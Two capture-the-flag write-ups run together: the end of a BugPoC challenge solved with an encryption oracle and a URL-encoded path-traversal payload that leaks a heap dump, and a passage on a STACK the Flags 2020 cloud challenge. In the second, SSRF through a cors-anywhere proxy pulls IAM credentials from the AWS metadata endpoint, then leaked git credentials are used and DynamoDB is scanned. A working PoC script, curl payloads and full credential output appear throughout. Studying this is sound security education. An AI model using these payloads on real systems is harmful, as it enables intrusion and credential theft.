{"path": "/dogs{\"UA\": \"/..%2fheapdump#\"}", "statusCode": 200, "body": "\"name,size,value;__name__,57,lambda_function;__doc__,56,None;__package__,60,;__loader__,59,<_frozen_importlib_external.SourceFileLoader object at 0x7f9e042319a0>;__spec__,57,ModuleSpec(name='lambda_function', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7f9e042319a0>, origin='/var/task/lambda_function.py');__file__,57,/var/task/lambda_function.py;__cached__,59,/var/task/__pycache__/lambda_function.cpython-38.pyc;__builtins__,61,{'__name__': 'builtins', '__doc__': \\\"Built-in functions, exceptions, and other objects.\\\\n\\\\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.\\\", '__package__': '', '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': ModuleSpec(name='builtins', loader=<class '_frozen_importlib.BuiltinImporter'>), '__build_class__': <built-in function __build_class__>, '__import__': <built-in function __import__>, 'abs': <built-in function abs>, 'all': <built-in function all>, 'any': <built-in function any>, 'ascii': <built-in function ascii>, 'bin': <built-in function bin>, 'breakpoint': <built-in function breakpoint>, 'callable': <built-in function callable>, 'chr': <built-in function chr>, 'compile': <built-in function compile>, 'delattr': <built-in function delattr>, 'dir': <built-in function dir>, 'divmod': <built-in function divmod>, 'eval': <built-in function eval>, 'exec': <built-in function exec>, 'format': <built-in function format>, 'getattr': <built-in function getattr>, 'globals': <built-in function globals>, 'hasattr': <built-in function hasattr>, 'hash': <built-in function hash>, 'hex': <built-in function hex>, 'id': <built-in function id>, 'input': <built-in function input>, 'isinstance': <built-in function isinstance>, 'issubclass': <built-in function issubclass>, 'iter': <built-in function iter>, 'len': <built-in function len>, 'locals': <built-in function locals>, 'max': <built-in function max>, 'min': <built-in function min>, 'next': <built-in function next>, 'oct': <built-in function oct>, 'ord': <built-in function ord>, 'pow': <built-in function pow>, 'print': <built-in function print>, 'repr': <built-in function repr>, 'round': <built-in function round>, 'setattr': <built-in function setattr>, 'sorted': <built-in function sorted>, 'sum': <built-in function sum>, 'vars': <built-in function vars>, 'None': None, 'Ellipsis': Ellipsis, 'NotImplemented': NotImplemented, 'False': False, 'True': True, 'bool': <class 'bool'>, 'memoryview': <class 'memoryview'>, 'bytearray': <class 'bytearray'>, 'bytes': <class 'bytes'>, 'classmethod': <class 'classmethod'>, 'complex': <class 'complex'>, 'dict': <class 'dict'>, 'enumerate': <class 'enumerate'>, 'filter': <class 'filter'>, 'float': <class 'float'>, 'frozenset': <class 'frozenset'>, 'property': <class 'property'>, 'int': <class 'int'>, 'list': <class 'list'>, 'map': <class 'map'>, 'object': <class 'object'>, 'range': <class 'range'>, 'reversed': <class 'reversed'>, 'set': <class 'set'>, 'slice': <class 'slice'>, 'staticmethod': <class 'staticmethod'>, 'str': <class 'str'>, 'super': <class 'super'>, 'tuple': <class 'tuple'>, 'type': <class 'type'>, 'zip': <class 'zip'>, '__debug__': True, 'BaseException': <class 'BaseException'>, 'Exception': <class 'Exception'>, 'TypeError': <class 'TypeError'>, 'StopAsyncIteration': <class 'StopAsyncIteration'>, 'StopIteration': <class 'StopIteration'>, 'GeneratorExit': <class 'GeneratorExit'>, 'SystemExit': <class 'SystemExit'>, 
'KeyboardInterrupt': <class 'KeyboardInterrupt'>, 'ImportError': <class 'ImportError'>, 'ModuleNotFoundError': <class 'ModuleNotFoundError'>, 'OSError': <class 'OSError'>, 'EnvironmentError': <class 'OSError'>, 'IOError': <class 'OSError'>, 'EOFError': <class 'EOFError'>, 'RuntimeError': <class 'RuntimeError'>, 'RecursionError': <class 'RecursionError'>, 'NotImplementedError': <class 'NotImplementedError'>, 'NameError': <class 'NameError'>, 'UnboundLocalError': <class 'UnboundLocalError'>, 'AttributeError': <class 'AttributeError'>, 'SyntaxError': <class 'SyntaxError'>, 'IndentationError': <class 'IndentationError'>, 'TabError': <class 'TabError'>, 'LookupError': <class 'LookupError'>, 'IndexError': <class 'IndexError'>, 'KeyError': <class 'KeyError'>, 'ValueError': <class 'ValueError'>, 'UnicodeError': <class 'UnicodeError'>, 'UnicodeEncodeError': <class 'UnicodeEncodeError'>, 'UnicodeDecodeError': <class 'UnicodeDecodeError'>, 'UnicodeTranslateError': <class 'UnicodeTranslateError'>, 'AssertionError': <class 'AssertionError'>, 'ArithmeticError': <class 'ArithmeticError'>, 'FloatingPointError': <class 'FloatingPointError'>, 'OverflowError': <class 'OverflowError'>, 'ZeroDivisionError': <class 'ZeroDivisionError'>, 'SystemError': <class 'SystemError'>, 'ReferenceError': <class 'ReferenceError'>, 'MemoryError': <class 'MemoryError'>, 'BufferError': <class 'BufferError'>, 'Warning': <class 'Warning'>, 'UserWarning': <class 'UserWarning'>, 'DeprecationWarning': <class 'DeprecationWarning'>, 'PendingDeprecationWarning': <class 'PendingDeprecationWarning'>, 'SyntaxWarning': <class 'SyntaxWarning'>, 'RuntimeWarning': <class 'RuntimeWarning'>, 'FutureWarning': <class 'FutureWarning'>, 'ImportWarning': <class 'ImportWarning'>, 'UnicodeWarning': <class 'UnicodeWarning'>, 'BytesWarning': <class 'BytesWarning'>, 'ResourceWarning': <class 'ResourceWarning'>, 'ConnectionError': <class 'ConnectionError'>, 'BlockingIOError': <class 'BlockingIOError'>, 'BrokenPipeError': <class 'BrokenPipeError'>, 'ChildProcessError': <class 'ChildProcessError'>, 'ConnectionAbortedError': <class 'ConnectionAbortedError'>, 'ConnectionRefusedError': <class 'ConnectionRefusedError'>, 'ConnectionResetError': <class 'ConnectionResetError'>, 'FileExistsError': <class 'FileExistsError'>, 'FileNotFoundError': <class 'FileNotFoundError'>, 'IsADirectoryError': <class 'IsADirectoryError'>, 'NotADirectoryError': <class 'NotADirectoryError'>, 'InterruptedError': <class 'InterruptedError'>, 'PermissionError': <class 'PermissionError'>, 'ProcessLookupError': <class 'ProcessLookupError'>, 'TimeoutError': <class 'TimeoutError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'copyright': Copyright (c) 2001-2021 Python Software Foundation.\\nAll Rights Reserved.\\n\\nCopyright (c) 2000 BeOpen.com.\\nAll Rights Reserved.\\n\\nCopyright (c) 1995-2001 Corporation for National Research Initiatives.\\nAll Rights Reserved.\\n\\nCopyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam.\\nAll Rights Reserved., 'credits':     Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands\\n    for supporting Python development.  
See www.python.org for more information., 'license': Type license() to see the full license text, 'help': Type help() for interactive help, or help(object) for help about object.};json,53,<module 'json' from '/var/lang/lib/python3.8/json/__init__.py'>;sys,52,<module 'sys' (built-in)>;SECRET_API_KEY,63,flag{gr8_job_h@cker};get_memory,59,<function get_memory at 0x7f9e03fb1160>;verify_internal_request,72,<function verify_internal_request at 0x7f9e03fb1280>;lambda_handler,63,<function lambda_handler at 0x7f9e03fb1310>;\""}

Near the end of the heap dump, we see the flag :)

Solution

To summarise, the following observations and steps led us to the flag:

  1. There is an internal endpoint (found through fuzzing) at /heapdump that dumps memory, including the SECRET_API_KEY variable which contains the flag.
  2. The publicly-accessible /get-dogs endpoint appends the decrypted x-param header value to the requested path as such: '/dogs' + decrypt(request.headers['x-param']).
  3. The publicly-accessible /fingerprint endpoint generates the encrypted value of {"UA": request.headers["User-Agent"]}, which gives rise to an encryption oracle.
  4. Although the /get-dogs endpoint has some protection against path traversal (e.g. stripping ../ from the request path), it is still possible to achieve path traversal by URL-encoding / as %2f.
  5. Leveraging the /fingerprint endpoint to generate the encrypted value of a path traversal payload, and then supplying the generated fingerprint as the x-param header to the /get-dogs endpoint, allows us to access the internal /heapdump endpoint and leak the flag.

For a valid solution submission, participants need to submit a proof-of-concept (PoC) hosted on BugPoC.
For simplicity, I opted to use their Python PoC to demonstrate the attack chain:

#!/usr/bin/env python3
import re
import requests

def main():
  endpoint = '/heapdump'
  # URL-encode every '/' to bypass the '../' stripping; '#' discards the trailing '"}' from the JSON serialisation
  path_traversal_payload = ('/..' + endpoint + '#').replace('/', '%2f')
  # encryption oracle: embed the payload as the User-Agent inside the fingerprint ciphertext
  encrypted = requests.get('https://doggo-api.buggywebsite.com/fingerprint', headers={'User-Agent': path_traversal_payload}).json()['fingerprint']
  # decryption oracle: replay the ciphertext as x-param so the server-side request hits /heapdump
  r = requests.get('https://doggo-api.buggywebsite.com/get-dogs', headers={'x-param': encrypted, 'x-fingerprint': 'a'})
  # extract 'SECRET_API_KEY,<size>,<value>' from the dump and format it nicely
  flag = re.search('SECRET_API_KEY[^;]+', r.text).group().split(',')
  flag[1] = ': '
  return ''.join(flag)

Running the proof-of-concept code using BugPoC’s Python PoC returns the following response containing the flag:

SECRET_API_KEY: flag{gr8_job_h@cker}

(Screenshot: Memory Leak Proof-of-Concept)

Challenge solved! :tada:

Closing Thoughts & Tips

As you might have noted by now, it is never a good idea to re-use the same encryption key for multiple purposes. An attacker with access to an encryption/decryption oracle can potentially trigger unintended behaviours (as demonstrated in this challenge). I have observed the re-use of a JWT signing key across production and staging servers a couple of times, which could be leveraged to achieve account takeover on the production server! :wink:

There are also a few tricks we can use to perform better testing, which I did not mention in the write-up for brevity. Firstly, we only hunted for endpoints from an external perspective. The path traversal bug in the server-side request could also have been leveraged to fuzz for endpoints from the internal perspective.

Next, the path traversal payload (i.e. ..%2f) specifically targeted the webserver’s URL path normalisation behaviour. Do note that there is no guarantee that it will work in real life, because we can’t know for sure which webserver is actually being used on the backend! There could be multiple reverse proxies in use, or none at all – it all depends, and we can only enumerate and do a bit of guessing-and-checking to confirm our suspicions!

Another thing we could have done is to leverage the /fingerprint endpoint to identify how the request is being fetched by the application:

$ curl -s -H 'User-Agent: /..%2ffingerprint#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkv0VCFdQy6oMxc1yJDY2WYHSKloG6Ik-OXHQ4Bw9CjgmAiO9j71e8rP_mJ0MM989mlsUiAlZaoPwsHr7vBd8a-E3tteAm4j4XJ1ASyXYJULa5-Y=
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/..%2ffingerprint#\"}", "statusCode": 200, "body": "{\"fingerprint\": \"gAAAAABgkv0bO6yEXGQL8R9ddHZiEQe4Twv6-3ASNLhIZmWPSLXl833cuoiE_JrcIHgEBa54X5cWiqpoHvVT_GQBqkdPFXwOviKnz5BWdcEReMrlMI0sH672s2Hf_3Gxy1xUpJQwEAKU\"}"}
$ curl -H "x-fingerprint: actually this value isn't validated" -H "x-param: gAAAAABgkv0bO6yEXGQL8R9ddHZiEQe4Twv6-3ASNLhIZmWPSLXl833cuoiE_JrcIHgEBa54X5cWiqpoHvVT_GQBqkdPFXwOviKnz5BWdcEReMrlMI0sH672s2Hf_3Gxy1xUpJQwEAKU" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"python-requests/2.22.0\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

From the User-Agent string, we can infer that the URL is likely fetched using the Requests Python library on the server-side. We could also examine and target a specific behaviour of the HTTP client used in our attack. For instance, did you know that urllib accepts “wrapped” URLs? Check out this writeup by @Gladiator to see how this behaviour was used to bypass a WAF in a CTF challenge!

I hope you enjoyed the write-up. :smiley:
Thanks BugPoC/@NahamSec for the fun challenge!

Here’s my write-up on yet another cloud challenge with no solves, titled Keep The Clouds Together…, in the STACK the Flags 2020 CTF organized by the Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG).

If you are new to cloud security, do check out my write-up for Share and Deploy the Containers cloud challenge before continuing on.

The attack path for this challenge is much longer and more complex than those of the other cloud challenges in the competition, further highlighting the difficulties of penetration testing infrastructures that span multiple cloud computing vendors.

Once again, shoutouts to Tan Kee Hock from GovTech’s CSG for putting together this challenge!

Keep the Clouds Together…

Description:
The recent arrest of an agent from COViD revealed that the punggol-digital-lock.com was part of the massive scam campaign targeted towards the citizens! It provided a free document encryption service to the citizens and now the site demands money to decrypt the previously encrypted files! Many citizens fell prey to their scheme and were unable to decrypt their files! We believe that the decryption key is broken up into parts and hidden deep within the system!

Notes - https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt

Introduction

The note at https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt has the following content:

Please get your act together. The site that is supposed load the list of affected individuals is not displaying properly.
index.html is not loading the users as expected.
For your convenience, I have also generated your git credentials. See me.

- COViD

Notice that the note is hosted on an Amazon S3 bucket named punggol-digital-lock-portal in the ap-southeast-1 region. From the note, we learn that there is an index.html object in the punggol-digital-lock-portal S3 bucket and that we should be looking for git credentials somewhere.

Let’s navigate to https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/index.html:

(Screenshot: S3 Bucket /index.html)

As the note mentioned, the list of affected individuals indeed fails to load.
Let’s take a peek at the JavaScript code included by the webpage:

var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://122.248.230.66/http://127.0.0.1:8080/dump-data", false);
xhttp.send();
var data = (JSON.parse(xhttp.responseText)).data;
for (i = 0; i < data.length; i++) {
    output = "<tr><td>" + (i+1) + "</td><td>" + data[i].name + "</td><td>" + data[i].no_of_files + "</td><td>" + data[i].total_file_size + "</td><td>" + Math.ceil(data[i].cash_bounty) + "</td></tr>";
document.write(output);
}

The page attempts to fetch JSON containing the list of affected individuals from the IP address 122.248.230.66, which belongs to Amazon Elastic Compute Cloud (EC2).

cors-anywhere = SSRF to Anywhere

If we navigate to http://122.248.230.66/, we can see the following response:

This API enables cross-origin requests to anywhere.

Usage:

/               Shows help
/iscorsneeded   This is the only resource on this host which is served without CORS headers.
/<url>          Create a request to <url>, and includes CORS headers in the response.

If the protocol is omitted, it defaults to http (https if port 443 is specified).

Cookies are disabled and stripped from requests.

Redirects are automatically followed. For debugging purposes, each followed redirect results
in the addition of a X-CORS-Redirect-n header, where n starts at 1. These headers are not
accessible by the XMLHttpRequest API.
After 5 redirects, redirects are not followed any more. The redirect response is sent back
to the browser, which can choose to follow the redirect (handled automatically by the browser).

The requested URL is available in the X-Request-URL response header.
The final URL, after following all redirects, is available in the X-Final-URL response header.


To prevent the use of the proxy for casual browsing, the API requires either the Origin
or the X-Requested-With header to be set. To avoid unnecessary preflight (OPTIONS) requests,
it's recommended to not manually set these headers in your code.


Demo          :   https://robwu.nl/cors-anywhere.html
Source code   :   https://github.com/Rob--W/cors-anywhere/
Documentation :   https://github.com/Rob--W/cors-anywhere/#documentation

This indicates that the cors-anywhere proxy application is deployed here, allowing us to perform Server-Side Request Forgery (SSRF) attacks. When browsing to http://122.248.230.66/http://127.0.0.1:8080/dump-data, we get the following error message:

Not found because of proxy error: Error: connect ECONNREFUSED 127.0.0.1:8080

This indicates that port 8080 appears to be inaccessible, hence the list of victims could not be loaded successfully.
Perhaps the webserver is not even hosted locally!
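
To script further probing through the proxy, a small helper suffices (a sketch using requests; per its help text, cors-anywhere expects an Origin or X-Requested-With header to be present):

import requests

PROXY = 'http://122.248.230.66'

def ssrf(url):
    # cors-anywhere forwards the request to <url> and relays the response
    r = requests.get(PROXY + '/' + url, headers={'X-Requested-With': 'XMLHttpRequest'})
    return r.text

print(ssrf('http://169.254.169.254/latest/meta-data/'))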

Since we have identified that the IP address 122.248.230.66 is an AWS EC2 instance, we can leverage the SSRF vulnerability to fetch information such as temporary IAM access keys from the AWS Instance Metadata Service:

$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/
punggol-digital-lock-service
$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/punggol-digital-lock-service
{
  "Code" : "Success",
  "LastUpdated" : "2020-12-09T21:53:30Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA4I6UNNJLGGSBLNBE",
  "SecretAccessKey" : "1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7",
  "Token" : "IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==",
  "Expiration" : "2020-12-10T04:13:44Z"
}

Great! We have successfully obtained temporary security credentials for the punggol-digital-lock-service assumed-role user.
Here’s a quick recap of our progress before we continue on:

(Screenshot: Initial Entrypoint Progress)

Enumerating punggol-digital-lock-service Role

I used WeirdAAL and AWS CLI v1 to automate the enumeration of the actions permitted for the assumed-role user.

$ cat ~/.aws/credentials
[default]
aws_access_key_id = ASIA4I6UNNJLGGSBLNBE
aws_secret_access_key = 1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7
aws_session_token = IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==

$ aws sts get-caller-identity
{
    "UserId": "AROA4I6UNNJLJABU4K2VW:i-0da9e688ab9264a5e",
    "Account": "843869678166",
    "Arn": "arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e"
}

$ cp ~/.aws/credentials .env

$ python3 weirdAAL.py -m recon_all -t punggol-digital-lock-service
...

$ python3 weirdAAL.py -m list_services_by_key -t punggol-digital-lock-service
[+] Services enumerated for ASIA4I6UNNJLIWT435IG [+]
codecommit.ListRepositories
dynamodb.ListTables
ec2.DescribeRouteTables
ec2.DescribeVpnConnections
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
s3.ListBuckets
sts.GetCallerIdentity

We can see a few interesting permitted actions, namely:

  • codecommit.ListRepositories relating to git repositories
  • dynamodb.ListTables relating to NoSQL databases
  • ec2.DescribeRouteTables relating to network routing tables of the Virtual Private Cloud (VPC)
  • ec2.DescribeVpnConnections relating to VPN tunnels
  • s3.ListBuckets relating to S3 buckets

Since we started the challenge from a note residing in an Amazon S3 bucket, let’s proceed to enumerate that first.

Getting git Credentials

First, we try to list all S3 buckets:

$ aws s3 ls
2020-11-21 18:36:15 punggol-digital-lock-portal

Seems like there’s only one bucket. Let’s list the objects in the S3 bucket:

$ aws s3 ls s3://punggol-digital-lock-portal/
2020-11-21 19:22:44       2513 index.html
2020-11-21 19:22:44        253 notes-to-covid-developers.txt
2020-11-21 20:37:57        274 some-credentials-for-you-lazy-bums.txt

There is a hidden file some-credentials-for-you-lazy-bums.txt in the punggol-digital-lock-portal S3 bucket!
Let’s fetch the hidden file:

$ aws s3 cp s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt .
download: s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt to ./some-credentials-for-you-lazy-bums.txt

The file some-credentials-for-you-lazy-bums.txt contains the following content:

covid-developer-at-843869678166
TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=

Use these credentials that I have provisioned for you! The other internal web application is still under development.
The other network engineers are busy getting our networks connected.

Great! We obtained git credentials successfully. I wonder where we can use them… :thinking:

git Those Repositories

That’s right! We can use them to access git repositories hosted on the AWS CodeCommit source control service.

Let’s first list all AWS CodeCommit repositories:

$ aws codecommit list-repositories
{
    "repositories": [
        {
            "repositoryName": "punggol-digital-lock-api",
            "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105"
        },
        {
            "repositoryName": "punggol-digital-lock-cors-server",
            "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e"
        }
    ]
}

Two code repositories are found. Let’s get more details of the respective repositories:

$ aws codecommit get-repository --repository-name punggol-digital-lock-api
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105",
        "repositoryName": "punggol-digital-lock-api",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985979.053,
        "creationDate": 1605985614.824,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-api"
    }
}

$ aws codecommit get-repository --repository-name punggol-digital-lock-cors-server
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e",
        "repositoryName": "punggol-digital-lock-cors-server",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985991.35,
        "creationDate": 1605985592.865,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-cors-server"
    }
}

Grab the two git clone URLs and fetch the two code repositories:

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server
Cloning into 'punggol-digital-lock-cors-server'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 8, done.
Unpacking objects: 100% (8/8), done.

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api
Cloning into 'punggol-digital-lock-api'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 7, done.
Unpacking objects: 100% (7/7), done.

Awesome! We now have both code repositories.

At this point, the punggol-digital-lock-api repository definitely sounds more interesting, since punggol-digital-lock-cors-server is likely just the cors-anywhere proxy application we encountered earlier, so let’s look at punggol-digital-lock-api first.

Getting to the Database

In the punggol-digital-lock-api repository, there is a Node.js application.

The source code of index.js is shown below:

var express = require('express')
var app = express()
var cors = require('cors');
var AWS = require("aws-sdk");
var corsOptions = {
    origin: 'http://punggol-digital-lock.internal',
    optionsSuccessStatus: 200 // some legacy browsers (IE11, various SmartTVs) choke on 204
}
AWS.config.loadFromPath('./node_config.json');
var ddb = new AWS.DynamoDB({ apiVersion: '2012-08-10' });
let dataStore = [];

const download_data = () => {
    return new Promise((resolve, reject) => {
        try {
            var params = {
                ExpressionAttributeValues: {
                    ':id': { N: '101' }
                },
                FilterExpression: 'id < :id',
                TableName: 'citizens'
            };
            ddb.scan(params, function (err, data) {
                if (err) {
                    console.log("Error", err);
                    return reject(null);
                } else {
                    results = []
                    data.Items.forEach(function (element, index, array) {
                        results.push({
                            'no_of_files': element.no_of_files.N,
                            'cash_bounty': element.cash_bounty.N,
                            'id': element.id.N,
                            'name': element.name.S,
                            'total_file_size': element.total_file_size.N
                        });
                    });
                    return resolve(results);
                }
            });
        } catch (err) {
            console.error(err);
        }
    });

}

async function boostrap() {
    dataStore = await download_data();
}

boostrap();

app.get('/dump-data', cors(corsOptions), function (req, res, next) {
    res.json({ data: dataStore });
})
app.listen(8080, function () {
    console.log('punggol-digital-lock-api server running on port 8080')
})

We can observe the internal hostname punggol-digital-lock.internal, and that the application fetches its list of records from an Amazon DynamoDB NoSQL database. Taking a closer look at the code, we can also see that the table name is citizens and that the code calls ddb.scan() to fetch records with id < 101.
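
For reference, the parameters of the application’s ddb.scan() call map directly onto AWS CLI flags, so the same filtered scan can be reproduced as follows (assuming our credentials are permitted to scan, which we verify shortly):

$ aws dynamodb scan --table-name citizens \
    --filter-expression 'id < :id' \
    --expression-attribute-values '{":id":{"N":"101"}}'

Keep the id < 101 filter in mind: any record with a larger id will never surface through the application itself.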

Scanning the Flag from DynamoDB

Let’s try to enumerate the Amazon DynamoDB NoSQL database further.

$ aws dynamodb list-tables
{
    "TableNames": [
        "citizens"
    ]
}

Looks like there’s only one table, citizens, in DynamoDB. Let’s try to query it and fetch all records with id > 0:

$ aws dynamodb query --table-name "citizens" --key-condition-expression 'id > :id' --expression-attribute-values '{":id":{"N":"0"}}'

An error occurred (AccessDeniedException) when calling the Query operation: User: arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e is not authorized to perform: dynamodb:Query on resource: arn:aws:dynamodb:ap-southeast-1:843869678166:table/citizens

Unfortunately, we don’t have the permission to do so. Instead of the query operation, let’s try using the scan operation to dump the table contents:

$ aws dynamodb scan --table-name citizens | wc -l
1724

That worked! That’s quite a bit of data to sieve through, so let’s grep for the flag in the JSON output:

$ aws dynamodb scan --table-name citizens | grep -A 5 -B 11 govtech
{
    "no_of_files": {
        "N": "0"
    },
    "cash_bounty": {
        "N": "0"
    },
    "id": {
        "N": "10000"
    },
    "name": {
        "S": "govtech-csg{Mult1_Cl0uD_"
    },
    "total_file_size": {
        "N": "0"
    }
},

And we successfully get the first half of the flag: govtech-csg{Mult1_Cl0uD_ :smile:
Before we continue to find the second half of the flag, let’s take a quick look at our progress at the moment:

Midpoint of Attack Path

VPN Subnet Routing

Now what? We have not looked at the punggol-digital-lock-cors-server code repository yet.

As expected, there is a Node.js application in index.js which simply sets up a cors-anywhere proxy:

// Listen on a specific host via the HOST environment variable
var host = '0.0.0.0';
// Listen on a specific port via the PORT environment variable
var port = 80;
var cors_proxy = require('cors-anywhere');
cors_proxy.createServer({
    originWhitelist: [], // Allow all origins
    setHeaders: {'x-requested-with': 'cors-server'},
    removeHeaders: ['cookie']
}).listen(port, host, function() {
    console.log('cors-server running on ' + host + ':' + port);
});

More importantly, there’s a note.txt:

Allow requests to be proxied to reach internal networks. Current network has routing enabled to the other VPN subnets.

